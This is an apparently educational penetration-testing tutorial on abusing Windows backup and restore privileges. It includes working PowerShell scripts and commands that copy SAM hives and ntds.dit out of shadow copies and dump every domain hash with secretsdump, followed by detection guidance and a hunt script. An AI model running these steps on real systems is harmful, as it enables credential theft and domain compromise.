Abusing SeBackupPrivilege and SeRestorePrivilege for Windows Privilege Escalation

Disclaimer: This article is for educational purposes and authorized security testing only. Only run these techniques against systems you own or have explicit, written permission to test. Unauthorized access to computer systems is illegal in virtually every jurisdiction.

Introduction / Overview

Windows privileges are not all created equal. A handful of them are effectively "game over" the moment your token holds them, even when you are not a member of the Administrators group. Two of the most powerful are SeBackupPrivilege ("Back up files and directories") and SeRestorePrivilege ("Restore files and directories").

These privileges are granted to the built-in Backup Operators group (Administrators hold them too, and on Domain Controllers so do Server Operators), and they are also frequently delegated to service accounts, backup software accounts, and helpdesk roles. In this article you'll learn:

  • Why SeBackupPrivilege lets you bypass NTFS DACLs and read files you have no permission to open.
  • How to extract the local SAM and SYSTEM hives for offline credential extraction.
  • How to copy ntds.dit off a Domain Controller to dump every domain hash.
  • How blue teams detect and contain this abuse.

This is a textbook privilege-escalation-to-credential-access pivot and maps to MITRE ATT&CK T1003 OS Credential Dumping, specifically T1003.002 (Security Account Manager) for the local hives and T1003.003 (NTDS) for the domain database.

How it works / Background

NTFS access checks normally compare your token against each file's DACL. SeBackupPrivilege short-circuits that: when a process whose token has the privilege enabled opens a file for backup intent (CreateFile() with FILE_FLAG_BACKUP_SEMANTICS, which reaches the kernel as FILE_OPEN_FOR_BACKUP_INTENT), the access check grants the read-side rights regardless of the DACL: READ_CONTROL, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_READ and FILE_TRAVERSE. Two details matter in practice. The privilege has to be enabled on the token, not merely present, so tools call AdjustTokenPrivileges() before the open. And the bypass is of permissions only, not of sharing: a file another process holds open without FILE_SHARE_READ still fails with ERROR_SHARING_VIOLATION, backup semantics or not.

SeRestorePrivilege is the mirror image: with backup intent it grants WRITE_DAC, WRITE_OWNER, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_WRITE, FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY and DELETE regardless of the DACL, so that backup software can restore data, including its ownership and ACLs, into protected locations.

The catch for an attacker is that the live registry hives and ntds.dit are held open without sharing (by the kernel and by lsass respectively), and backup semantics does nothing about a sharing lock, so you cannot simply copy them. Two things get you past the lock, and a third is how you copy once the lock is out of the way:

  1. reg save — RegSaveKey writes a consistent snapshot of a hive to a new file through the registry itself, so the lock on the live hive file is irrelevant. It requires SeBackupPrivilege, which reg.exe enables on its own.
  2. Volume Shadow Copy (diskshadow) — create a point-in-time snapshot of the volume and expose it as a drive letter; the copy of ntds.dit inside the snapshot is not held open by anyone.
  3. robocopy /b — Robocopy's backup mode opens files with backup semantics, so it honors SeBackupPrivilege and gets past the DACL that a plain copy trips over (Windows\NTDS inside the snapshot is readable only by SYSTEM and Administrators). It does not get past the lock on the live file.
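
The mechanism behind robocopy /b and the SeBackupPrivilege helper module, reduced to the few Win32 calls involved. This is an added example, not code from the article or from either tool: it enables SeBackupPrivilege on the current token with AdjustTokenPrivileges(), opens a file with FILE_FLAG_BACKUP_SEMANTICS, and streams it out. It assumes a token that holds the privilege (for example Backup Operators), an exposed shadow copy at Z: and a writable C:\Temp; those paths are assumptions.

```powershell
# Added example (not from the original article): DACL bypass via backup semantics, by hand.
# Assumes the token holds SeBackupPrivilege (e.g. Backup Operators membership).
$src = @'
using System;
using System.IO;
using System.ComponentModel;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;

public static class BackupRead
{
    [StructLayout(LayoutKind.Sequential)] struct LUID { public uint LowPart; public int HighPart; }
    // TOKEN_PRIVILEGES with exactly one LUID_AND_ATTRIBUTES entry
    [StructLayout(LayoutKind.Sequential)] struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }

    const uint SE_PRIVILEGE_ENABLED       = 0x00000002;
    const uint TOKEN_ADJUST_PRIVILEGES    = 0x00000020;
    const uint TOKEN_QUERY                = 0x00000008;
    const uint GENERIC_READ               = 0x80000000;
    const uint FILE_SHARE_ALL             = 0x00000007;   // READ | WRITE | DELETE
    const uint OPEN_EXISTING              = 3;
    const uint FILE_FLAG_BACKUP_SEMANTICS = 0x02000000;
    const int  ERROR_NOT_ALL_ASSIGNED     = 1300;

    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES newState,
                                             uint bufferLength, IntPtr previousState, IntPtr returnLength);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern SafeFileHandle CreateFile(string path, uint access, uint share, IntPtr securityAttributes,
                                            uint disposition, uint flags, IntPtr template);

    // Turn a privilege that whoami /priv lists as Disabled into Enabled. Fails if the token does not hold it at all.
    public static void EnablePrivilege(string name)
    {
        IntPtr token;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out token))
            throw new Win32Exception();
        try
        {
            LUID luid;
            if (!LookupPrivilegeValue(null, name, out luid)) throw new Win32Exception();
            TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES { PrivilegeCount = 1, Luid = luid, Attributes = SE_PRIVILEGE_ENABLED };
            if (!AdjustTokenPrivileges(token, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero)) throw new Win32Exception();
            // AdjustTokenPrivileges returns TRUE even when it could not enable everything; the answer is in the last error
            if (Marshal.GetLastWin32Error() == ERROR_NOT_ALL_ASSIGNED)
                throw new InvalidOperationException(name + " is not present in this token");
        }
        finally { CloseHandle(token); }
    }

    // Open src with backup intent (DACL ignored because SeBackupPrivilege is enabled) and stream it to dst.
    // Sharing is NOT bypassed: a file held open exclusively still fails with ERROR_SHARING_VIOLATION (32).
    public static long CopyWithBackupSemantics(string src, string dst)
    {
        EnablePrivilege("SeBackupPrivilege");
        SafeFileHandle h = CreateFile(src, GENERIC_READ, FILE_SHARE_ALL, IntPtr.Zero,
                                      OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero);
        if (h.IsInvalid) throw new Win32Exception();   // 5 = Access denied (no privilege), 32 = sharing violation (locked)
        using (FileStream fin = new FileStream(h, FileAccess.Read))
        using (FileStream fout = File.Create(dst))
        {
            fin.CopyTo(fout);
            fout.Flush();
            return fout.Length;
        }
    }
}
'@
Add-Type -TypeDefinition $src

# Inside a shadow copy the file is not locked, so only the DACL stands in the way, and backup semantics removes it.
# Paths are assumptions: Z: is an exposed shadow copy, C:\Temp is writable.
[BackupRead]::CopyWithBackupSemantics('Z:\Windows\NTDS\ntds.dit', 'C:\Temp\ntds.dit')

# The live database is held open by lsass without sharing: this throws "being used by another process" (32),
# not "Access is denied" (5), which is the whole reason the snapshot step exists.
try { [BackupRead]::CopyWithBackupSemantics('C:\Windows\NTDS\ntds.dit', 'C:\Temp\live.dit') }
catch { Write-Warning $_.Exception.Message }
```

The two calls at the end are the point of the example: the same code reads the protected file out of the snapshot but fails on the live one, and the error code tells you which wall you hit. A plain Copy-Item of the snapshot path would fail with Access denied because Windows\NTDS is readable only by SYSTEM and Administrators.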

Prerequisites / Lab setup

  • A Windows host (workstation or Domain Controller) where your compromised account is a member of Backup Operators, or otherwise holds the privileges.
  • A foothold shell (WinRM/evil-winrm, RDP, or a reverse shell).
  • An offline cracking/parsing host with impacket (secretsdump.py) installed.

First, confirm the privileges are actually present and enabled in your token:

whoami /priv

Look for SeBackupPrivilege and SeRestorePrivilege with state Enabled. If they show as Disabled, they are still in the token and the tools used below (reg.exe, robocopy, or a helper like SeBackupPrivilegeUtils from the SeBackupPrivilege PowerShell module) enable them on demand through AdjustTokenPrivileges; presence in the list is what matters. If they are missing entirely although the account is a Backup Operator, you are probably in a UAC-filtered interactive session (Backup Operators is one of the groups UAC strips from the default token); an elevated prompt, or a network logon such as WinRM, usually carries the full token.

Attack walkthrough / PoC

Case 1: Local SAM/SYSTEM on a member host

The local account hashes live in the SAM hive, encrypted with the boot key stored in SYSTEM. With SeBackupPrivilege you can save both:

reg save HKLM\SAM C:\Temp\SAM.hive
reg save HKLM\SYSTEM C:\Temp\SYSTEM.hive
reg save HKLM\SECURITY C:\Temp\SECURITY.hive

Exfiltrate them (SMB, evil-winrm's download, etc.) and parse offline with impacket:

secretsdump.py -sam SAM.hive -system SYSTEM.hive -security SECURITY.hive LOCAL

SECURITY is optional but worth grabbing — it yields cached domain logons (DCC2) and LSA secrets, which often include service-account plaintext passwords.

Case 2: Copying ntds.dit off a Domain Controller

On a DC, the crown jewels are ntds.dit (the AD database) plus the SYSTEM hive, which holds the boot key that protects it. ntds.dit is held open exclusively by lsass, and reg save only snapshots registry hives, so here you need a shadow copy and then a copy tool that opens with backup semantics to get past the DACL on Windows\NTDS.

Option A — diskshadow. Write the following to C:\Temp\shadow.txt, one diskshadow command per line:

set context persistent nowriters
set metadata C:\Temp\meta.cab
add volume C: alias adshadow
create
expose %adshadow% Z:

Then feed it to diskshadow:

diskshadow /s C:\Temp\shadow.txt

The volume is now mounted at Z:. Copy the database and registry out of the snapshot using robocopy /b (backup mode), which lets the copy honor SeBackupPrivilege:

robocopy /b Z:\Windows\NTDS C:\Temp ntds.dit
reg save HKLM\SYSTEM C:\Temp\SYSTEM.hive
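
Option A end to end as one script, including the cleanup that the manual steps above leave out. This is an added example, not from the article: it writes the diskshadow script, exposes the snapshot, copies ntds.dit with robocopy /b, saves SYSTEM with reg save, records SHA-256 hashes so the copies can be verified after exfiltration, and always deletes the exposed shadow afterwards. It assumes a Backup Operators token on the DC, a writable C:\Temp and a free Z: drive letter; all three are assumptions.

```powershell
# Added example (not from the original article): the Option A procedure end-to-end, with cleanup.
# Assumes a Backup Operators token, PowerShell on the DC, and that C:\Temp and Z: are free to use.
param(
    [string]$Work   = 'C:\Temp',
    [string]$Volume = 'C:',
    [string]$Drive  = 'Z:'
)
$ErrorActionPreference = 'Stop'
New-Item -ItemType Directory -Path $Work -Force | Out-Null

$createScript = Join-Path $Work 'shadow.txt'
$deleteScript = Join-Path $Work 'unshadow.txt'
$metadata     = Join-Path $Work 'meta.cab'
Remove-Item $metadata -ErrorAction SilentlyContinue   # start from a clean metadata file

# One diskshadow command per line. persistent + nowriters: the snapshot survives the diskshadow
# process and no VSS writer coordination is needed just to read files out of it.
@"
set context persistent nowriters
set metadata $metadata
add volume $Volume alias adshadow
create
expose %adshadow% $Drive
"@ | Set-Content -Path $createScript -Encoding ASCII

# 'delete shadows exposed <drive>' removes the snapshot behind a drive letter without needing its GUID
"delete shadows exposed $Drive" | Set-Content -Path $deleteScript -Encoding ASCII

try {
    & diskshadow.exe /s $createScript | Out-Null
    if (-not (Test-Path "$Drive\Windows\NTDS\ntds.dit")) { throw "snapshot was not exposed at $Drive" }

    # /b opens with backup semantics; that is what gets past the SYSTEM/Administrators-only DACL on \Windows\NTDS
    & robocopy.exe /b "$Drive\Windows\NTDS" $Work ntds.dit | Out-Null
    if ($LASTEXITCODE -ge 8) { throw "robocopy failed, exit code $LASTEXITCODE" }   # 0-7 are success variants

    # SYSTEM hive via RegSaveKey: consistent snapshot, the lock on the live hive file does not matter
    & reg.exe save HKLM\SYSTEM (Join-Path $Work 'SYSTEM.hive') /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg save failed, exit code $LASTEXITCODE" }

    # Record hashes now so the copies can be verified after exfiltration
    Get-FileHash -Algorithm SHA256 -Path (Join-Path $Work 'ntds.dit'), (Join-Path $Work 'SYSTEM.hive') |
        Select-Object Hash, Path
}
finally {
    # Never leave an exposed shadow, the metadata cab or the scripts behind
    & diskshadow.exe /s $deleteScript | Out-Null
    Remove-Item $createScript, $deleteScript, $metadata -ErrorAction SilentlyContinue
}
```

The finally block is the part worth copying even if you run the rest by hand: an exposed shadow of a DC volume that outlives the engagement is both an artifact for the blue team and a readable copy of the domain database for anyone else who finds it.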

Option B — robocopy backup mode against the live volume. This is tempting but does not work for ntds.dit: /b uses FILE_FLAG_BACKUP_SEMANTICS, which only bypasses the DACL, while lsass holds the database open with no sharing, so

robocopy /b C:\Windows\NTDS C:\Temp ntds.dit

fails with "The process cannot access the file because it is being used by another process" (ERROR_SHARING_VIOLATION, 32) rather than "Access is denied" (5). Where robocopy /b on its own does pay off is files that are merely permission-protected and not in use, such as configuration or credential files of other users and services that your account cannot otherwise read. For ntds.dit, take the snapshot.

Then dump every domain hash offline:

secretsdump.py -ntds ntds.dit -system SYSTEM.hive LOCAL

This yields the NTLM hash of every domain account, including krbtgt — which is exactly what you need to forge a Golden Ticket. See Golden Ticket attacks and DCSync explained for what to do with those hashes next.

Case 3: SeRestorePrivilege-only paths

If you hold SeRestorePrivilege but not SeBackupPrivilege, the abuse shifts from reading to writing protected files, and because the privilege also grants WRITE_OWNER and WRITE_DAC you can take ownership of, and re-ACL, anything you cannot overwrite outright. Classic primitives: overwrite the binary behind a service that runs as SYSTEM (its ImagePath), drop a malicious DLL into a hijackable load path of a privileged process, or replace the accessibility binaries sethc.exe (Sticky Keys) or utilman.exe with cmd.exe so the logon screen launches a SYSTEM shell. A privileged scheduled task's target works the same way. The key point: write-anywhere plus an auto-elevating trigger equals SYSTEM. For DLL hijack mechanics, see DLL hijacking.

Mermaid diagram

Flow: a Backup Operator confirms the privilege, dumps either local hives or ntds.dit, parses them offline with secretsdump, and pivots to domain compromise.

Detection & Defense (Blue Team)

Treat membership in privileged backup roles as Tier-0 and monitor it like Domain Admin.

Reduce exposure

  • Audit the Backup Operators group and the "Back up files and directories" / "Restore files and directories" user-rights assignments (SeBackupPrivilege / SeRestorePrivilege) via secedit /export or GPO Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment. Remove standing membership; grant it just-in-time.
  • Run backup software under a dedicated, tightly scoped account, and never let interactive/helpdesk users inherit these rights.
  • On Domain Controllers, restrict who can log on at all (Allow log on locally / through Remote Desktop) so these privileges can't be exercised by lateral movers.

Detect

  • 4672 — Special privileges assigned to new logon: alert when SeBackupPrivilege/SeRestorePrivilege appear for non-backup accounts or outside backup windows. This fires for every administrator logon too, so baseline it; a token that carries SeBackupPrivilege but not SeDebugPrivilege is a Backup-Operator-style token rather than a full admin and deserves a closer look.
  • 4673 / 4674 under Audit Sensitive Privilege Use record the actual use of SeBackupPrivilege and SeRestorePrivilege. They are noisy on backup servers; scope them to DCs and to hosts that run no backup agent.
  • Shadow copy activity: process creation for diskshadow.exe, vssadmin.exe (create shadow) and wmic shadowcopy call create, plus the VSS and volsnap informational events in the Application and System logs. On a DC, a snapshot being exposed as a drive letter by anything other than the backup product is suspicious on its own.
  • Process and command-line auditing (Sysmon Event ID 1, or 4688 with command-line logging enabled) for reg.exe save, robocopy ... /b, and diskshadow /s. reg save HKLM\SAM, or any access to ntds.dit outside the backup product, is high-fidelity.
  • Object access auditing (4663, which needs a SACL on the objects) on C:\Windows\NTDS\ntds.dit and on the SAM/SYSTEM hive files under C:\Windows\System32\config — backup software has a known, allowlistable pattern; anything else is suspicious.
  • EDR file-handle telemetry: opens of ntds.dit or registry hives with FILE_FLAG_BACKUP_SEMANTICS from non-backup binaries.
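
The first and fourth bullets as a runnable hunt over the Security and Sysmon logs. This is an added example, not from the article: one function pulls 4672 logons whose privilege list contains SeBackupPrivilege, drops allowlisted and machine accounts, and applies the "no SeDebugPrivilege" heuristic to separate Backup-Operator-style tokens from full administrators; the other scans Sysmon process-creation command lines for reg save, diskshadow, robocopy /b, vssadmin create shadow and any mention of ntds.dit. The allowlisted account CORP\svc-backup is a placeholder, and the SeDebugPrivilege heuristic is this page's editorial suggestion, not a Microsoft rule.

```powershell
# Added example (not from the original article): hunt for the signals listed above in the Security and
# Sysmon logs. The allowlisted account is a placeholder; the "SeBackupPrivilege without SeDebugPrivilege"
# rule is an editorial heuristic for spotting Backup-Operator-style tokens.
function ConvertFrom-EventData {
    # Flatten <EventData><Data Name="x">value</Data>... into a hashtable keyed by Name
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $x = [xml]$Event.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    $d
}

function Get-BackupPrivilegeLogons {
    param(
        [datetime]$Since = (Get-Date).AddDays(-1),
        [string[]]$AllowedAccounts = @('CORP\svc-backup')   # assumed: the backup product's service account
    )
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4672; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ConvertFrom-EventData $_
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Account = '{0}\{1}' -f $d['SubjectDomainName'], $d['SubjectUserName']
                LogonId = $d['SubjectLogonId']
                Privs   = @($d['PrivilegeList'] -split '\s+' | Where-Object { $_ })
            }
        } |
        Where-Object {
            # 4672 fires for every admin logon; admins carry SeDebugPrivilege, Backup Operators do not
            $_.Privs -contains 'SeBackupPrivilege' -and
            $_.Privs -notcontains 'SeDebugPrivilege' -and
            $AllowedAccounts -notcontains $_.Account -and
            $_.Account -notmatch '\\[^\\]+\$$'
        }
}

function Get-BackupToolingExecutions {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    # Command lines the techniques in this article need (quoted or unquoted image paths),
    # plus any direct reference to the AD database file
    $patterns = @(
        '(^|\\|")reg(\.exe)?"?\s+save\s',
        '(^|\\|")diskshadow(\.exe)?"?(\s|$)',
        '(^|\\|")robocopy(\.exe)?"?\s.*\s/b(\s|$)',
        '(^|\\|")vssadmin(\.exe)?"?\s.*create\s+shadow',
        'ntds\.dit'
    )
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d   = ConvertFrom-EventData $_
            $cmd = [string]$d['CommandLine']
            $hit = $patterns | Where-Object { $cmd -imatch $_ } | Select-Object -First 1
            if ($hit) {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    User        = $d['User']
                    Image       = $d['Image']
                    Parent      = $d['ParentImage']
                    CommandLine = $cmd
                    Rule        = $hit
                }
            }
        }
}

Get-BackupPrivilegeLogons   | Format-Table Time, Account, LogonId -AutoSize
Get-BackupToolingExecutions | Format-Table Time, User, Image, CommandLine -AutoSize
```

Run it on a DC as part of a scheduled hunt or feed both functions into your SIEM as the reference logic. Joining the two outputs on the account or logon ID is the high-fidelity case: a Backup-Operator-style 4672 followed within minutes by reg save or diskshadow from the same session is exactly the sequence the walkthrough above produces.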

Contain

  • Rotate any credentials that may have been dumped. If ntds.dit was touched, treat the domain as compromised: rotate krbtgt twice, then reset privileged accounts.
  • Enable Credential Guard and LSA protection to raise the cost of complementary credential theft, and keep offline hive copies (and shadow exposures) from lingering on disk.

Conclusion

SeBackupPrivilege and SeRestorePrivilege are a reminder that "not an admin" is not the same as "not dangerous." A single Backup Operator membership lets an attacker bypass NTFS DACLs, snapshot the registry and ntds.dit, and walk away with every hash in the domain. Defenders should treat these user rights as Tier-0, grant them just-in-time, and alert on the very specific tooling (reg save, diskshadow, robocopy /b) that abuse requires.
